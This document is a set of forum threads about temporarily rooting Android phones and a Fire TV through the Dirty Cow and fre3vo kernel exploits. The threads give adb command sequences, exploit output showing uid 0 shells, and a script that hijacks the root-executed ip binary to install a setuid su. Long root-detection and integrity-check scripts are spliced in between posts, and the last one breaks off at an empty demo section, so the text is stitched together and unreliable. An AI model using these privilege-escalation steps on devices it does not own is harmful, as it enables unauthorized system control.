[XT1028 XT10XX] Lollipop - temporary root achieved ! - Moto G General

Thanks to @kryz who managed to generalize the Dirty Cow exploit, XT1028 now has a way to get temporary root: link. Notice that /system will still be read-only, but at least full access to /data is available. Given the state of XT1028, this looks like pretty good progress!
Steps to get temp root (in Lollipop):
1) install Croowt.apk, use the 2nd option in the menu: "Get root"
2) install SuperSu apk from the playstore (don't update the binary)
3) install RootChecker apk from the playstore
4) enjoy temporary root (until hard reboot)
The earlier post for Android 4.4.4:
For all KitKat holdouts, I've tried to use Dirty Cow and got temp root. Could work on other Android versions as well. Now, at least this root does not seem to crash as much (unlike Kingroot). Here is a brief set of steps. First, download this package:
https://mega.nz/#!LFlBRAhS!rDl7PJMkFq7HqUDDgbKV6ddv-C3qkQIJl_CJkhkx2sc
Then
Code:
adb push dirtycow /data/local/tmp
adb push cow-execute /data/local/tmp
adb shell
cd /data/local/tmp
chmod 0777 *
shell@falcon_cdma:/data/local/tmp $ ./dirtycow /system/bin/run-as ./cow-execute
bin/run-as ./cow-execute <
warning: new file size (13728) and file old size (9432) differ
size 13728
[*] mmap 0xb6e64000
[*] exploit (patch)
[*] currently 0xb6e64000=464c457f
[*] madvise = 0xb6e64000 13728
[*] madvise = 0 1048576
[*] /proc/self/mem 0 1048576
[*] exploited 0xb6e64000=464c457f
shell@falcon_cdma:/data/local/tmp $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@falcon_cdma:/data/local/tmp $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments
shell@falcon_cdma:/data/local/tmp #
Not sure how much one can do here without bootloader unlock though ...

Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.

linuxgator said:
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
Try this, see if you can copy su binary to system (it will disappear after reboot) :
http://android.stackexchange.com/questions/127230/android-adb-has-root-access-but-no-su-binary
Then soft reboot to make it work, in root shell type :
killall zygote
The hope is to get you SuperSu (until next reboot). I believe we are probably back to where these phones were with the old Pie exploit:
http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623
Kingroot used to be able to make a fake copy of itself into /system which disappeared soon after.
I have this stupid Watcher on my phone, and don't want to try these other steps since I don't want it to kill my corporate email ...

Updated with the new Lollipop instructions!
@linuxgator

Nice link down

@bibikalka any chance you can post the kitkat version again?

G2 2.3.4 OTA 1-Click temp-root

Thanks for the move orb3000
EDIT:
Apparently I can't post links either... what gives??? Going to have to do this the ghetto way I guess..
Anyway, I made a nice little .bat to temp-root the 2.3.4 OTA for the T-Mobile G2 (HTC Vision) for all you lazy people out there, or the people who are just tired of playing with the cmd (like myself).
It's on media fire... www(dot)mediafire(dot)com/?xwurdlpcw61oxiz
Just unzip and run "rootg2.bat"
It uses fre3vo, as it is the only method that currently works. If this for some reason does NOT work for you, edit rootg2.bat and change the address set to one of the following after a reboot
FAA90000 -end FFFFFFFF
10000000 -end 1FFFFFFF
20000000 -end 2FFFFFFF
30000000 -end 3FFFFFFF
F0000000 -end FFFFFFFF
E0000000 -end EFFFFFFF
Find one that works?? Great! Now you have a bat juuuuuust for you.
Long time lurker, first time poster, micro sized developer.
how to install
Hi, I'm not very good with this. Can you let me know how to install the g2root file on my G2? By the way, is this a permanent root? Thx
tntx said:
Hi, I'm not very good with this. Can you let me know how to install the g2root file on my G2? By the way, is this a permanent root? Thx
It says in the title this is a temporary root, not permanent. Check the [REF] Sticky in either General or Development for guides that will help you through the process. DO NOT attempt root until you are sure you know what you are doing. READ and SEARCH!
Does anyone know of a way to temp-root on-device, without having to hook up to a PC?
After the message "daemon started successfully" the adb just hangs at that line, no crash, just doesn't advance any further. I can't input any commands either. I waited for over an hour to see if it would proceed, but not as such. Any ideas?
RebelScum75 said:
Does anyone know of a way to temp-root on-device, without having to hook up to a PC?
Hi!
I know that there is none
Have fun - Guhl
will this also work for the desire z ?
No dude, I've been looking forever. Finally had a reason to root the darn thing, but I don't think there is one, at least not that I have found. I work for Verizon now anyway, left my TMO, lol.
dianlb50 said:
will this also work for the desire z ?
Yes, basically the same phone.
Did this work for anyone?
Sent from my T-Mobile G2 using XDA App
I'm having issues getting this to work. I have tried the various addresses with no solid confirmation of whether it worked or not, aside from running the app "Root Check" or attempting to use an app that requires root, and finding that the phone is indeed, not rooted.
The results vary; however, at best the process appears to have gone through smoothly. Daemon was successful, it successfully locates the region, and finally successfully dismounts and remounts, which leaves us at the stage where it says press any key to continue.
Are there additional steps? What conditions must be met in order for this to work other than turning on debugging mode? Must the usb cord remain connected? Does the temp root end once the cord is unplugged? The guide above didn't exactly give any clear cut step-by-step directions and so I am feeling as if I'm not doing something because the guide doesn't mention it.
Can someone who has successfully temp-rooted their G2 v2.3.4 post a list of steps needed from start to finish? Example:
1) Enable USB debugging on phone.
2) Plug phone into computer via USB cord.
3) Unzip g2root.zip into a folder of your choice.
4) Run g2root.bat.
5) If successful, you will see (fill in the blank)
6) If successful, go to step 7, if unsuccessful, reboot computer/phone and retry step 1
Something like the above directions would be extremely useful to a few of us. Thanks!
-HobbesG2
Hello, I think this is my first post over here.
enable usb debugging on the phone
Plug phone into computer via USB
kill adb if it is already running:
Code:
./adb kill-server
start adb server as root:
Code:
sudo ./adb start-server
sample output:
Code:
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Code:
./adb wait-for-device
and wait for this command to exit
Code:
./adb push /PUT/PATH/TO/G2ROOT/HERE/fre3vo /data/local/tmp
sample output:
Code:
218 KB/s (9796 bytes in 0.043s)
Code:
./adb -d shell chmod 777 /data/local/tmp/fre3vo
Code:
./adb -d shell /data/local/tmp/fre3vo -debug -start fb040000 -end FFFFFFFF
sample output:
Code:
fre3vo by #teamwin
Please wait...
Attempting to modify ro.secure property...
fb_fix_screeninfo:
id: msmfb
smem_start: 2fd00000
smem_len: 300000
type: 0
type_aux: 0
visual: 2
xpanstep: 0
ypanstep: 1
line_length: 1920
mmio_start: 0
accel: 0
fb_var_screeninfo:
xres: 480
yres: 800
xres_virtual: 480
yres_virtual: 1600
xoffset: 0
yoffset: 0
bits_per_pixel: 32
activate: 16
height: 80
width: 48
rotate: 0
grayscale: 0
nonstd: 0
accel_flags: 0
pixclock: 0
left_margin: 0
right_margin: 0
upper_margin: 0
lower_margin: 0
hsync_len: 0
vsync_len: 0
sync: 0
vmode: 0
Frame Buffer handle: 4
Buffer offset: 002ee000
Buffer size: 8192
Scanning region fb040000...
Scanning region fb130000...
Scanning region fb220000...
Scanning region fb310000...
Scanning region fb400000...
Scanning region fb4f0000...
Scanning region fb5e0000...
Scanning region fb6d0000...
Scanning region fb7c0000...
Scanning region fb8b0000...
Scanning region fb9a0000...
Scanning region fba90000...
Potential exploit area found at address fbb54e00:1200.
Exploiting device...
Code:
adb wait-for-device
Code:
./adb -d remount
sample output:
Code:
remount succeeded
verify you have root:
Code:
./adb -d shell id
output:
Code:
uid=0(root) gid=0(root)
Or you could verify it worked by executing 'adb shell' and if you have a # prompt rather than $, it worked.
This will stick until you reboot. Unplugging the cable will not affect it (unless you're currently running the commands)
This is not exactly a true temp-root, as it just gives adb root access, but you should be able to remount /system as rw and push su and SuperUser.apk to the right places to get a proper temp-root.
-Nipqer
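The verification steps in the first post (`run-as -exec id`) and in Nipqer's walkthrough above (`adb -d shell id`, the `#` prompt, fre3vo's change to ro.secure) all read device state by hand; the script below, an added example rather than code from any post in this thread, turns those indicators into a repeatable root-state check. The `id`, `getprop`, `/proc/mounts` and `ls -l` captures embedded here are constructed samples; on a real device the script gathers them itself.

```shell
#!/bin/sh
# Root-state check for an Android device (added example, not from this thread).
# Each check is a function over captured command output, so the logic runs
# offline against the constructed samples at the bottom; gather_and_assess()
# runs the real commands when executed on a device.

# Numeric uid from `id` output such as "uid=0(root) gid=0(root) groups=..."
uid_of() {
    printf '%s\n' "$1" | sed -n 's/^uid=\([0-9][0-9]*\).*/\1/p'
}

# Value of one property from a `getprop` dump ("[ro.secure]: [1]" per line).
# Prints nothing when the property is absent.
prop_value() {
    props=$1
    esc=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape dots for the regex
    printf '%s\n' "$props" | sed -n "s/^\[$esc\]: \[\(.*\)\]$/\1/p"
}

# Mount mode ("ro" or "rw") of a mount point from /proc/mounts text: the mode
# is the first option in the fourth field. Prints nothing if not mounted.
mount_mode() {
    printf '%s\n' "$1" | awk -v mp="$2" '$2 == mp { split($4, o, ","); print o[1]; exit }'
}

# Count of setuid su binaries in `ls -l` output: the mode field has the s bit
# in the owner-execute slot ("-rws...") and the name is "su".
setuid_su_count() {
    printf '%s\n' "$1" | awk '$1 ~ /^-..s/ && ($NF == "su" || $NF ~ /\/su$/) { n++ } END { print n + 0 }'
}

# One finding per line. $1 = `id` output, $2 = getprop dump,
# $3 = /proc/mounts text, $4 = `ls -l` output for the su candidate paths.
assess() {
    if [ "$(uid_of "$1")" = "0" ]; then
        echo "shell runs as uid 0: adbd or the shell was escalated to root"
    fi
    if [ "$(prop_value "$2" ro.secure)" = "0" ]; then
        echo "ro.secure=0: adbd no longer drops to the shell uid (fre3vo flips this)"
    fi
    if [ "$(prop_value "$2" ro.debuggable)" = "1" ]; then
        echo "ro.debuggable=1: debug build, or the property was patched"
    fi
    if [ "$(mount_mode "$3" /system)" = "rw" ]; then
        echo "/system is mounted read-write (stock devices keep it ro)"
    fi
    if [ "$(setuid_su_count "$4")" -gt 0 ]; then
        echo "setuid su binary present in a system path"
    fi
}

# Number of findings; 0 means none of the indicators fired.
finding_count() {
    assess "$1" "$2" "$3" "$4" | awk 'END { print NR }'
}

# Live mode: on a device (getprop exists) gather the real inputs.
gather_and_assess() {
    assess "$(id)" "$(getprop)" "$(cat /proc/mounts)" \
           "$(ls -l /system/bin/su /system/xbin/su 2>&1)"
}

# Constructed samples: a stock KitKat device, and the same device after a
# temp root like the ones in this thread (# prompt, su pushed to /system/xbin).
CLEAN_ID='uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input) context=u:r:shell:s0'
CLEAN_PROPS='[ro.secure]: [1]
[ro.debuggable]: [0]
[ro.build.version.release]: [4.4.4]'
CLEAN_MOUNTS='/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,nosuid,nodev,noatime 0 0'
CLEAN_LS='/system/bin/su: No such file or directory
/system/xbin/su: No such file or directory'

ROOTED_ID='uid=0(root) gid=0(root) groups=1003(graphics),1004(input) context=u:r:runas:s0'
ROOTED_PROPS='[ro.secure]: [0]
[ro.debuggable]: [1]
[ro.build.version.release]: [4.4.4]'
ROOTED_MOUNTS='/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 rw,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,nosuid,nodev,noatime 0 0'
ROOTED_LS='-rwsr-sr-x root     root        22228 2011-09-14 20:12 su'

if command -v getprop >/dev/null 2>&1; then
    gather_and_assess
else
    echo "stock sample: $(finding_count "$CLEAN_ID" "$CLEAN_PROPS" "$CLEAN_MOUNTS" "$CLEAN_LS") finding(s)"
    echo "rooted sample: $(finding_count "$ROOTED_ID" "$ROOTED_PROPS" "$ROOTED_MOUNTS" "$ROOTED_LS") finding(s)"
    assess "$ROOTED_ID" "$ROOTED_PROPS" "$ROOTED_MOUNTS" "$ROOTED_LS"
fi
```

Pushed to /data/local/tmp and run with `adb shell sh /data/local/tmp/rootcheck.sh`, it reports which of the indicators a temp root left behind; after a reboot of a device that was only temp-rooted, all of them should clear again.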
Nipqer said:
you should be able to remount /system as rw and push su and SuperUser.apk to the right places to get a proper temp-root.
Could you please describe how to do that? Where do I get these packages from?
Getting closer but still not quite there. The reason why I was not having confirmations before was because I was running the rootg2.bat file directly rather than doing it through the cmd prompt, aka Start --> Run --> [type cmd]. After having run the .bat file via the cmd prompt, I was able to apply, and confirm via the steps that were mentioned.
Problem is, I'm still not exactly truly temp-rooted, as none of my apps that require root or are designed to check root, show me as rooted. Is this because superuser and/or busybox are not operating as if they are rooted due to something I'm not aware of?
I already have the latest Superuser/Elite and BusyBox installed onto my phone via the Market. Do I have to push them into a specific folder that simply installing them from the Market won't do automatically?
Any thoughts?
After I get this nailed down, I will write a comprehensive explanation for others to do this as well.
Here is a true temp-root which works with fre3vo.
Just read the readme file.
-Nipqer
any update on this one?
i hope this makes rooting easier...
Nipqer said:
Here is a true temp-root which works with fre3vo.
Just read the readme file.
-Nipqer
I see this method listed for the Sensation, has it been proven to work for G2, stock OTA 2.3.4?
Wondering the same.
If you are running 2.3.x, and use fre3vo, then run that zip I posted, you will have proper temp-root.
It will stick until a reboot, but then you can just redo everything.
Yes it's proven to work.
-Nipqer

[GUIDE] How to get root/flash custom roms with HTCDEV unlock

I know some people out there will use the new "official" htcdev.com unlock option for the G2/DZ, but they will still need to do **** to get root or flash custom roms.
I REALLY RECOMMEND USING THE XDA METHOD OF ACQUIRING ROOT AND S-OFF
S-OFF is possible! We can relock the bootloader to allow a downgrade
Go to FASTBOOT USB mode (where you got the unlock token code, and unlocked the bootloader)
Code:
fastboot oem lock
You can then downgrade by following this guide
And get S-OFF with this guide
DO NOT LOCK THE BOOTLOADER IF YOU DON'T WANT TO ROOT PROPERLY!
LOCKING THE BOOTLOADER WILL CAUSE THE REST OF THIS GUIDE TO FAIL!
-------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------
First, some background as to why these methods are needed.
The HTC 'official' unlock method lets /system be written (given root access) in any mode.
The boot partition, and recovery are only writeable in fastboot mode though. So we need to flash a recovery through fastboot, flash a custom rom, then flash its boot image to be able to boot it.
GAINING ROOT ON STOCK ROM
Gaining Temp Root
DHD USERS WITH SENSE 3.x WILL HAVE TO USE TACOROOT
1. Download the attached files, unzip them, and place the files in your platform-tools folder. To elaborate, place the fre3vo file contained in fre3vo.zip in your platform-tools directory.
2. Run the following command to verify the exploit has access to what it needs. (Only the first line is the command. The second line should be the result returned if all goes well.)
Code:
> adb shell cat /dev/msm_rotator
/dev/msm_rotator: invalid length
3. If you received the same message, you're good to continue on. If not... I'd recommend going back to #g2root and asking them. (I am just passing along the information after all).
4. Run the following commands from your platform-tools directory.
Code:
> adb push fre3vo /data/local/tmp
> adb shell
$ chmod 777 /data/local/tmp/fre3vo
$ /data/local/tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
5. After you enter that command, with luck you should see something similar to the last few lines in the following displayed. (It may take a minute or two. From what I can tell, this appears to be the quickest method as the exploit seems to be found in the latter regions.)
Code:
Buffer offset: 00000000
Buffer size: 8192
Scanning region fb7b0000...
Scanning region fb8a0000...
Scanning region fb990000...
Scanning region fba90000...
Potential exploit area found at address fbb4d600:a00.
Exploiting device...
6. If you did get kicked out of adb shell, open it again. You should now see the lovely # instead of $, thus granting you temp root. Go ahead and exit out of shell to proceed to the next stage.
Code:
> adb shell
# exit
Getting Perm-Root
1. Download the attached file, "Vision-fre3vo-temp-root.zip".
2. Extract the contents to your platform-tools directory.
3. Run the following commands in command prompt while in platform-tools directory:
Code:
> adb push su /data/local/tmp/
> adb push busybox /data/local/tmp/
> adb push fixsu.sh /data/local/tmp/
> adb install SuperUser.apk
> adb shell chmod 755 /data/local/tmp/fixsu.sh
> adb shell chmod 755 /data/local/tmp/busybox
> adb shell /data/local/tmp/fixsu.sh
Note: If you get permission denied errors on busybox when trying to run fixsu.sh, please let me know.
4. Reboot phone, you should now have perm-root.
FLASHING A CUSTOM ROM
Flashing a custom recovery
Note: this only needs to be done once
1. Download a custom recovery: Latest Clockworkmod, Clockworkmod Touch, 4ext Touch
2. Place the recovery img in the folder with fastboot.exe (which you used to unlock your device), rename the recovery to recovery.img
3. Reboot phone to fastboot mode: Either pull battery and hold TRACKPAD and press power, or run 'adb reboot bootloader' from a cmd/terminal
4. Run
Code:
> fastboot flash recovery recovery.img
sending 'recovery' (4930 KB)...
OKAY [ 0.851s]
writing 'recovery'...
OKAY [ 0.819s]
finished. total time: 1.670s
Flashing a custom rom
1. Download the rom.zip you wish to run.
2. Extract boot.img from the zip and place it in the folder with fastboot.
3. Copy the rom.zip to your sdcard
4. Flash the rom.zip from your sdcard
5. Reboot to fastboot mode (as above)
6. Run from a cmd/terminal
Code:
> fastboot flash boot boot.img
sending 'boot' (4096 KB)...
OKAY [ 0.711s]
writing 'boot'...
OKAY [ 1.085s]
finished. total time: 1.798s
7. Reboot, you will now have a custom rom!
Credits:
Setherio, seeing as I ripped off half his guide.
Pierre_ja, helping figure out how to go about this.
If you get stuck with any of this, join #G2ROOT on freenode
-Nipqer
I'll try this ASAP. This bootloader has only brought me a **** load of headache, hope this works..
Thanks!
Yay a tester. let me know how it works.
We've had 1 person get root, and 2 flash custom roms with this, but I'd appreciate any feedback.
-Nipqer
fixsu.sh permission denied
Good to know that XDA has people like you to help out.
Couldn't get root, here's the result:
C:\Android SDK\android-sdk\platform-tools>adb shell cat /dev/msm_rotator
/dev/msm_rotator: invalid length
C:\Android SDK\android-sdk\platform-tools>adb push fre3vo /data/local/tmp
869 KB/s (9796 bytes in 0.011s)
C:\Android SDK\android-sdk\platform-tools>adb shell
$ chmod 777 /data/local/tmp
chmod 777 /data/local/tmp
$ chmod 777 /data/local/tmp/fre3vo
chmod 777 /data/local/tmp/fre3vo
$ /data/local//tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
/data/local//tmp/fre3vo -debug -start FAA90000 -end FFFFFFFF
fre3vo by #teamwin
Please wait...
Attempting to modify ro.secure property...
fb_fix_screeninfo:
id: msmfb
smem_start: 802160640
smem_len: 3145728
type: 0
type_aux: 0
visual: 2
xpanstep: 0
ypanstep: 1
line_length: 1920
mmio_start: 0
accel: 0
fb_var_screeninfo:
xres: 480
yres: 800
xres_virtual: 480
yres_virtual: 1600
xoffset: 0
yoffset: 0
bits_per_pixel: 32
activate: 16
height: 80
width: 48
rotate: 0
grayscale: 0
nonstd: 0
accel_flags: 0
pixclock: 0
left_margin: 0
right_margin: 0
upper_margin: 0
lower_margin: 0
hsync_len: 0
vsync_len: 0
sync: 0
vmode: 0
Buffer offset: 00000000
Buffer size: 8192
Scanning region faa90000...
Scanning region fab80000...
Scanning region fac70000...
Scanning region fad60000...
Scanning region fae50000...
Scanning region faf40000...
Scanning region fb030000...
Scanning region fb120000...
Scanning region fb210000...
Scanning region fb300000...
Scanning region fb3f0000...
Scanning region fb4e0000...
Scanning region fb5d0000...
Scanning region fb6c0000...
Scanning region fb7b0000...
Scanning region fb8a0000...
Scanning region fb990000...
Scanning region fba80000...
Potential exploit area found at address fbb6e200:e00.
Exploiting device...
C:\Android SDK\android-sdk\platform-tools>adb shell
# exit
exit
C:\Android SDK\android-sdk\platform-tools>adb push su /data/local/tmp/
1205 KB/s (22228 bytes in 0.018s)
C:\Android SDK\android-sdk\platform-tools>adb push busybox /data/local/tmp/
1683 KB/s (1372660 bytes in 0.796s)
C:\Android SDK\android-sdk\platform-tools>adb push fixsu.sh /data/local/tmp/
109 KB/s (560 bytes in 0.005s)
C:\Android SDK\android-sdk\platform-tools>adb install Superuser.apk
1060 KB/s (196521 bytes in 0.181s)
pkg: /data/local/tmp/Superuser.apk
Success
C:\Android SDK\android-sdk\platform-tools>adb shell chmod 755 /data/local/tmp/fixsu.sh
C:\Android SDK\android-sdk\platform-tools>adb shell /data/local/tmp/fixsu.sh
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
C:\Android SDK\android-sdk\platform-tools>adb shell chmod 755 /data/local/tmp/fixsu.sh
C:\Android SDK\android-sdk\platform-tools>adb shell /data/local/tmp/fixsu.sh
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
/data/local/tmp/fixsu.sh: /data/local/tmp/busybox: permission denied
C:\Android SDK\android-sdk\platform-tools>
Hmm, I wonder why thats happening...
Want to join the IRC channel so we can sort this out?
-Nipqer
How do I join?
EDIT: I'll do a full factory restore, format the sdcard and try this out again.
Go to http://webchat.freenode.net/
choose a nickname, in channels enter #G2ROOT (with the hash)
-Nipqer
Hi Guys.
I'm @ work, but gonna try this in my break asap.
Sorry if I have missed something, but don't you need the eng hboot in order to use "fastboot flash" ?
Sent from my Desire Z running CM7.
I've done everything as above.
Everything went just fine.
But when I start SetCPU, it comes up with "root access not detected". Did you allow SetCPU through Superuser permissions?
In the superuser app (which is visible) I can't edit anything?
Also, it's not showing a pop up with "allow"
Am I doing something wrong?
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
C:\Android\platform-tools>fastboot flash recovery recovery.img
< waiting for device >
steviewevie said:
Sorry if I have missed something, but don't you need the eng hboot in order to use "fastboot flash" ?
Sent from my Desire Z running CM7.
The hboot HTC provides for the unlock supports fastboot commands; took us a while to figure that out at #g2root.
---------- Post added at 05:11 PM ---------- Previous post was at 05:08 PM ----------
wm6.5 said:
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
C:\Android\platform-tools>fastboot flash recovery recovery.img
< waiting for device >
you have to boot in fastboot mode to be able to issue fastboot commands:
from shell ($ or #) while the phone is connected to the computer:
Code:
exit
adb reboot bootloader
from normal win cmd (the > prompt):
Code:
adb reboot bootloader
petarpLab said:
The hboot HTC provides for the unlock supports fastboot commands; took us a while to figure that out at #g2root.
Ok, cool, thanks for the info. That's something useful it does then.
Sent from my Desire Z running CM7.
wm6.5 said:
C:\>cd android
C:\Android>cd platform-tools
C:\Android\platform-tools>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ fastboot flash recovery recovery.img
fastboot flash recovery recovery.img
fastboot: permission denied
$
$ exit
exit
You need to run fastboot from your PC, not the phone
Sent from my Desire Z running CM7.
wm6.5: I don't know if SetCPU can work on stock roms with root. You might need a different kernel for it.
-Nipqer
Nipqer said:
Yay a tester. let me know how it works.
We've had 1 person get root, and 2 flash custom roms with this, but I'd appreciate any feedback.
-Nipqer
You sir, just made my day!
Guide works like a charm! thank you!
Nipqer, thanks Mate.
Got everything sorted out on G2root on irc!
Your guide is the .... thanks again!
Thanks this saved me! The guys on g2root irc are way too helpful! Much thanks to them, no thanks to HTC unlocker for wasting a day of my life.
Is there any way of getting S-Off after you've used the HTC Dev Unlock?
No, not yet. As soon as we have figured out a way I'll update the OP.
-Nipqer

SuperSU not autostarting

Hello, I hope someone has seen this before. I am not sure how I managed to break S7, as it was working, initially. I am running PE1 firmware, and factory reset before following the root guide, in the verizon guide forums. But now I have the problem where supersu will not auto start on bootup. I have to connect the usb cable to my pc, and use adb and manually start it. Root and Supersu are loaded. The only thing I have to run is:
C:\adb\adb.exe shell /system/etc/launch_daemonsu.sh
Then disconnect the usb cable, and all is well. Everything seems to be correct. What am I missing? I really do not want to start completely over. I have run the verizon debloat v2 and v8. I had to manually start supersu to flashfire the v8 script. Also in the same guide. All the root checker apps will see that you have root, but they say you are missing a super user app.
C:\adb\adb.exe shell /system/etc/launch_daemonsu.sh
mkdir: '/su': File exists
cp: /cache/stock_boot_*: No such file or directory
cp: bad '/cache/stock_boot_*': No such file or directory
/data/su.img: recovering journal
ext2fs_close2 : fs->write_bitmaps is null
ext2fs_close2 : normal operation, return 0
skipping journal recoverybecause INCOMPAT_RECOVER was clear.
check whether gdt & bitmap free count is vaild
/data/su.img: clean, 25/2048 files, 1399/8192 blocks
ext2fs_close2 : fs->write_bitmaps is null
ext2fs_close2 : normal operation, return 0
mount: No such file or directory
mount: No such file or directory
supolicy v2.74 (ndk:arm64-v8a) - Copyright (C) 2014-2016 - Chainfire
Patching policy ...
(Android M policy compatibility mode)
- Success
<Then disconnect the usb cable, supersu will work fine now.>
C:\adb>adb shell cat /system/etc/init.sec.boot.sh
#!/system/bin/sh
echo "init.sec.boot.sh: start" > /dev/kmsg
# start deferred initcalls
cat /proc/deferred_initcalls
## strace for system_server
#str=""
#while [ "$str" = "" ]; do
# str=`ps | grep system_server`
# sleep 0.1
#done
#
#pid=${str:10:4}
#echo "init.sec.boot.sh: strace -tt -T -o /data/log/strace.txt -p ${pid}" > /dev/kmsg
#strace -tt -T -o /data/log/strace.txt -p ${pid}
/system/etc/launch_daemonsu.sh
/data/s7startup/startupscript.sh
C:\adb>adb shell ls -la /system/etc/launch_daemonsu.sh
-rwx------ root root 4686 2016-07-03 13:32 launch_daemonsu.sh
Thanks again.
Did you push the SuperSU app to your device?
Is that to say you've got SuperSU installed but it won't start? If that's so, I would check the box for "start SuperSU during bootup". Unless I'm just completely missing your issue, and I'm sorry if I am.

[GUIDE] I Rooted my Fire TV via dirtycow

Hi,
I just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external links here.)
Dirtycow allows you to write to files even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here.) Another problem was that the modification only lasts for the current boot, so I could not just modify boot scripts. I had to find a binary that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV GUI, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script that deploys the su binary.
This is what I did:
I compiled dirtycow.c from timwr's GitHub repository CVE-2016-5195
Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
Now I pushed Chainfire's su binary to /data/local/tmp
I copied the /system/bin/ip binary to /data/local/tmp
I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
Code:
#!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su
/data/local/tmp/ip "$@"
After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
Now I went to my network settings of my Fire TV and changed them to a static ip address.
I reconnected to my Amazon Fire TV and typed su
Code:
shell@bueller:/ $ su
shell@bueller:/ #
Lastly I installed the Supersu.apk from chainfire
Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.
This rooting method should also work for other versions of the fireOS, though I have not tested them.
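As an added example (not the poster's code) for the `ip` swap described in the post above: a baseline hash comparison plus an ELF-magic check flags a root-executed binary whose contents changed, and it works here because Dirty COW's modification is served from the page cache, so a normal read of the file already returns the swapped bytes until the next reboot. It assumes a `sha256sum` on the device (toybox or busybox); the two manifests embedded below are constructed, with made-up hashes.

```shell
#!/bin/sh
# Integrity check for root-executed system binaries (added example, not code
# from this thread). manifest_diff() compares two "hash  path" manifests, the
# kind make_manifest() produces on a device; is_elf() catches the specific
# symptom of the post above: a "binary" that is now a shell script.

# Build "hash  path" lines for the given files (sha256sum is assumed present).
make_manifest() {
    sha256sum "$@" 2>/dev/null
}

# One line per difference, sorted: "modified <path>", "missing <path>"
# (in baseline only) or "new <path>" (in current only). Blank lines ignored.
manifest_diff() {
    baseline=$1
    current=$2
    {
        printf '%s\n' "$baseline" | awk 'NF >= 2 { print "B", $1, $2 }'
        printf '%s\n' "$current"  | awk 'NF >= 2 { print "C", $1, $2 }'
    } | awk '
        $1 == "B" { base[$3] = $2; next }
        $1 == "C" { cur[$3] = $2; next }
        END {
            for (p in base) {
                if (!(p in cur)) print "missing " p
                else if (base[p] != cur[p]) print "modified " p
            }
            for (p in cur) if (!(p in base)) print "new " p
        }' | sort
}

# True when the file starts with the ELF magic 7f 45 4c 46 (the same
# 464c457f value the exploit log prints in little-endian form).
is_elf() {
    [ "$(dd if="$1" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# Constructed baseline from a known-good boot (hash values are made up).
BASELINE='aaaa1111aaaa1111aaaa1111aaaa1111aaaa1111aaaa1111aaaa1111aaaa1111  /system/bin/ip
bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222  /system/bin/run-as
cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333  /system/bin/sh'

# Constructed current state: ip replaced, su dropped into /system/xbin.
CURRENT='dddd4444dddd4444dddd4444dddd4444dddd4444dddd4444dddd4444dddd4444  /system/bin/ip
bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222bbbb2222  /system/bin/run-as
cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333cccc3333  /system/bin/sh
eeee5555eeee5555eeee5555eeee5555eeee5555eeee5555eeee5555eeee5555  /system/xbin/su'

# Demo: diff the constructed manifests, then the ELF check on two temp files
# standing in for the original ip binary and the script that replaced it.
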